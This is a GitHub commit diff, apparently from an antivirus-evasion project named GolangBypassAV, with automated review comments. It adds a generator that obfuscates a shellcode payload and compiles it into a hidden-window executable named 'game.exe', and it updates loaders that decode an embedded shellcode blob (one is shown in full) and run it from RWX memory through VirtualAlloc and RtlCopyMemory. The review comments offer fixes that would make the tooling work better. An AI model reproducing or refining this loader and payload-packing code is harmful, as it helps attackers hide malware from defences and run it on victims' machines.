gen
safe6Sec committed Aug 22, 2021
1 parent e295930 commit d836ae9
Showing 5 changed files with 73 additions and 43 deletions.
2 changes: 2 additions & 0 deletions README.md
Expand Up @@ -35,6 +35,8 @@ go build -ldflags="-s -w -H=windowsgui" -o main2.exe


## 参考
https://github.com/Rvn0xsy/BadCode
https://github.com/Airboi/bypass-av-note
https://github.com/brimstone/go-shellcode
https://github.com/timwhitez/Doge-Loader
https://github.com/fcre1938/goShellCodeByPassVT
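--- a/gen/main.go
+++ b/gen/main.go
@@ -0,0 +1,48 @@
+package main
+
+import (
+"encoding/base64"
+"fmt"
+"io/ioutil"
+"os"
+"os/exec"
+"strings"
+)
+
+var kkk = []byte{0x23, 0x32}
+
+func getEnCode(data []byte) string {
+bdata1 := base64.StdEncoding.EncodeToString(data)
+bydata1 := []byte(bdata1)
+var shellcode []byte
+
+for i := 0; i < len(bydata1); i++ {
+shellcode = append(shellcode, bydata1[i]+kkk[0]-kkk[1])
+}
+return base64.StdEncoding.EncodeToString(shellcode)
+}
+
+func main() {
+
+path := "C:\\Users\\Administrator\\Desktop\\payload.bin"
+if len(os.Args) >= 2 {
+path = os.Args[1]
+}
+sc, _ := ioutil.ReadFile(path)
+bdata := getEnCode(sc)
+fmt.Println(bdata)
+ioutil.WriteFile("shellcode.txt", []byte(bdata), 0666)
+
+tmpl, _ := ioutil.ReadFile("./genExe")
+
+code := string(tmpl)
+
+code = strings.ReplaceAll(code, "${bdata}", bdata)
+
+ioutil.WriteFile("shellcode.go", []byte(code), 0666)
+cmd := exec.Command("go", "build", "shellcode.go", "-ldflags=\"-s -w -H=windowsgui\"", "-o", "game.exe", "shellcode.go")
+//cmd:=exec.Command("go","build shellcode.go -ldflags=\"-s -w -H=windowsgui\" -o main2.exe shellcode.go")
+cmd.Run()
+//os.Remove("shellcode.go")
+
+}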
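Review bot: Every error in `main` is discarded, so a wrong payload path or a missing `./genExe` template yields an empty encoded payload and an empty `shellcode.go` with no message, and the result of `cmd.Run()` on the `go build` line is never inspected, so a failed build is indistinguishable from success. The `go build` argument list also looks malformed: `-ldflags` and `-o` come after the positional `shellcode.go`, where the go tool stops flag parsing and treats them as file arguments, the embedded `\"` characters are passed literally because no shell strips them, and `shellcode.go` is listed twice. I would check each `ioutil.ReadFile`/`WriteFile` error and the `Run` error (`if err := cmd.Run(); err != nil { fmt.Println(err); os.Exit(1) }`) and place the flags before the file name. `kkk` here is a second copy of `kk` in test2/main.go; a comment above it such as `// encoder key; must stay identical to kk in the loaders` would make the coupling visible, since nothing else ties the two together.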
43 changes: 6 additions & 37 deletions test2/main.go
Expand Up @@ -3,8 +3,6 @@ package main
import (
"GolangBypassAV/encry"
"encoding/base64"
"fmt"
"os"
"syscall"
"time"
"unsafe"
Expand All @@ -16,26 +14,15 @@ const (
PAGE_EXECUTE_READWRITE = 0x40
)

var kk = []byte{0x13, 0x32}

func base64Decode(data string) []byte {
data1, _ := base64.StdEncoding.DecodeString(data)
return data1
}

func base64Encode(data []byte) string {
bdata := base64.StdEncoding.EncodeToString(data)
return bdata
}
var kk = []byte{0x23, 0x32}

func getEnCode(data []byte) string {
bdata := base64.StdEncoding.EncodeToString(data)

bydata := []byte(bdata)
bdata1 := base64.StdEncoding.EncodeToString(data)
bydata1 := []byte(bdata1)
var shellcode []byte

for i := 0; i < len(bydata); i++ {
shellcode = append(shellcode, bydata[i]+kk[0]-kk[1])
for i := 0; i < len(bydata1); i++ {
shellcode = append(shellcode, bydata1[i]+kk[0]-kk[1])
}
return base64.StdEncoding.EncodeToString(shellcode)
}
Expand Down Expand Up @@ -63,15 +50,6 @@ func getDeCode(string2 string) []byte {

}

func checkError(err error) {
if err != nil {
if err.Error() != "The operation completed successfully." {
println(err.Error())
os.Exit(1)
}
}
}

func genEXE(charcode []byte) {

addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
Expand All @@ -96,24 +74,15 @@ func gd() int64 {

func getFileShellCode(file string) []byte {
data := encry.ReadFile(file)
//shellCodeHex := encry.GetBase64Data(data)
//fmt.Print(shellCodeHex)
return data
}

func getFileShellCode1(file string) string {
data := encry.ReadFile(file)
shellCodeHex := base64Encode(data)
fmt.Print(shellCodeHex)
return shellCodeHex
}

func main() {
//fmt.Println(1)

//fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin")))

bbdata := "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"
bbdata := "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"
shellCodeHex := getDeCode(bbdata)
gd()
genEXE(shellCodeHex)
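Review bot: The new `var kk = []byte{0x23, 0x32}` is the decode key for the embedded `bbdata`, and the identical pair lives independently as `kkk` in gen/main.go; this commit moved it from 0x13 to 0x23 here, and nothing checks that the two agree, so a future drift will decode to garbage that `genEXE` then copies into executable memory without any validity check. A comment such as `// must match kkk in gen/main.go: encoder and decoder share this key` above the declaration, or a single shared constant, would make the dependency explicit. `getEnCode` in this file now appears to be a copy of the generator's function, and its only call site in `main` is commented out, so it may be dead code here. `getDeCode` and `genEXE` start and end outside the hunks.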
11 changes: 5 additions & 6 deletions test8/main.go
Expand Up @@ -44,7 +44,7 @@ var (
//kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
//VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
DllTestDef, _ = syscall.LoadLibrary("kernel32.dll")
kernel32, _ = syscall.LoadLibrary("kernel32.dll")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

Expand Down Expand Up @@ -75,10 +75,10 @@ func checkError(err error) {

func genEXE(charcode []byte) {

defer syscall.FreeLibrary(DllTestDef)
add, err := syscall.GetProcAddress(DllTestDef, "VirtualAlloc")
defer syscall.FreeLibrary(kernel32)
VirtualAlloc, err := syscall.GetProcAddress(kernel32, "VirtualAlloc")

addr, _, err := syscall.Syscall(add, 0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
addr, _, err := syscall.Syscall(VirtualAlloc, 0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)

//addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if err != nil && err.Error() != "The operation completed successfully." {
Expand Down Expand Up @@ -115,11 +115,10 @@ func getFileShellCode1(file string) string {
}

func main() {
//fmt.Println(1)

//fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin")))

bbdata := "ECZKJRYxJVBaIiIiIiYnMzI3IzQ2NzsqLkUrTTQqVTQ6JkotNklJKkoSKkg0KlVaNiZIMVURUSw1NSkrNCUpIlMlWUlHIipUKiYpI1oyEiMiRClKGDcrIzY2Si02SiQtMktZKiJFI05IOUg6JFgrEkRQViJKIiIiIiZKJ1gpM080IikyNipVKigmNC0yJCMrIkUlSzdMSxBaNigtLypJKiJFOy8uRE0qLkQkVDJEKSslNiYjWDVLSEVHJy4iEVhMJCY2FhE5OTo4JjQtMiQzKyJFI04yOlQuNCY0LTIjWSsiRSMjSlg0KjQiKTIyN0kjOCcWOzhMJzoyN00jOExKJRgkIyM2VxBIOCYnOzhMSi0mVk0xEBAQEDk4UCI0QxYUQjgWUUNONxEiJic4NDpPTjUqT1kyQ1EuRVo6KRAaNyouRE0qLkUrLy5EIy8uRE0jNiYnMjJDUBc3T05PEBo5U0QSUSpKRCcjViQiJSIiIy8uRE0jNjYnM0JILyM2NigXNxVOR1lXEDcXEk1DNCpPIzQlKTQ0Ok86NTUpKzZOSCIiTCQmNk0rI1ZWVTctS1cQEjZKK1lMSiVYEiNSJE0aKkpHJypKRVErWRklEBAQEBA1NSkrNk0rI1ZKESgoKVcQEjo5IiUVOEUiMiIiNDEQMSUVNC4iMiIiFxoxURYiJiIiMEpKEBAQEC0UTRcvWy4iTDs4N0UlRTYiQkoaUEI1KydRFiNVVhZQOiYvVjJDQxJJUC1IO1pOEElTSjYVRxdMLxlVTTlYW00XQlIoT0lYOjRYMFNTLy4WEDJWMUNINyc0T1sXGFYyFFlKNToZVFMrRiIjN0QTN1otNidPOzgWETBKIy9DFFFRQyhZSS1bNlYuJCJQOhMaVUQoJxFCOCtUOzVUSDU3LyszNCIWLUsiGCopJ0w7OS9TKiUqVi8kFVkuSzpbLUsqWC5bVEg3E01WOygaFERaIzA3JCITLUsmGConRTE3WzoRMFojNkROTUw7OBYRLVs2Vi4kTC8kSCI5OU8TVxIYQzckGC9GWi8sWy83E1kVOxpOU0tKTxhaWTQ0Tjk3E04qR0JKIltVUiM4U0UqLEQqUBoqMBoRT1g5TUtbMURLFUoaNiU6NjIjOzIaGBApOBBOKUtZVlkWOBY0FlgkNFESFCUyGDVYM05IQyZYFSMiWCkYFTNJMUhXTEITFVEMRlQwTiwnFU4aGkU3GRpVK0opSEpUJjkqKhMRFE5WW1YuM1gmOE1USygtMTBKLxURTjArRylLE0w0VyoXKhEaOFAXMjZHFCVGRBY3KDFZSykYThNXQyZENxdDEUdQU1AZJCxaRTRZKhg4QlUYKk01KDdZUUpGURZTK043LylTFUUVWyoiMkMYWFVCKzgQGjcqLkROFyIiIyIiJigVIiMiIiImKBYyIiIiIiYoFzgsMzUWRxA3NCsvNTYRSisWEUorGTZKKxNMKBUiJCIiIiZOKww2KBcmUUIrFVcQNzQqMSYqKjkiRS07TkpYRSoiRDAnWCk5OTgnSTo0IjYiIiIiIjYuMVBPEBQQEFsmWi5KFRYtSyYSL1oVWS5LKiImSzM4RiIeHg=="
bbdata := "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"
shellCodeHex := getDeCode(bbdata)
gd()
genEXE(shellCodeHex)
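Review bot: The `err` returned by `syscall.GetProcAddress(kernel32, "VirtualAlloc")` is never examined: two lines later `addr, _, err := syscall.Syscall(...)` overwrites it, so if the lookup fails (for example because `kernel32, _ = syscall.LoadLibrary("kernel32.dll")` above also silently returned a zero handle) the code calls through address 0 and the process faults with no diagnostic. I would handle the error right after the GetProcAddress line (`if err != nil { println(err.Error()); os.Exit(1) }`, or via the file's `checkError`) and check the LoadLibrary error instead of discarding it. Note also that the second parameter of `syscall.Syscall` is the argument count rather than the callee's first argument, so the `0` on that line is not the `lpAddress` that the commented-out `VirtualAlloc.Call(0, ...)` passed; worth confirming the intended arguments actually reach VirtualAlloc. Since `kernel32` is now a package-level handle, the `defer syscall.FreeLibrary(kernel32)` inside `genEXE` frees it on the first call, leaving a stale handle if `genEXE` can run more than once. `genEXE`'s body continues outside the hunk.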
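--- a/tmp/main.go
+++ b/tmp/main.go
@@ -0,0 +1,12 @@
+package main
+
+import (
+"encoding/base64"
+"io/ioutil"
+)
+
+func main() {
+ss, _ := base64.StdEncoding.DecodeString("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")
+ioutil.WriteFile("a.zip", ss, 0666)
+
+}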
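Review bot: Both errors in `main` are discarded: if the base64 literal is malformed, `DecodeString` returns the bytes decoded so far together with an error, and that truncated content is written to `a.zip` as if it were complete, while a failing `WriteFile` is equally invisible. Checking both (`if err != nil { log.Fatal(err) }` after each call, with a `log` import) turns a silently corrupt archive into a clear failure. The literal itself is not visible here, so I cannot say what the archive contains; a one-line comment above the call stating what `a.zip` is and why it is embedded would help the next reader. `io/ioutil` has also been deprecated since Go 1.16, and `os.WriteFile` is the drop-in replacement.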
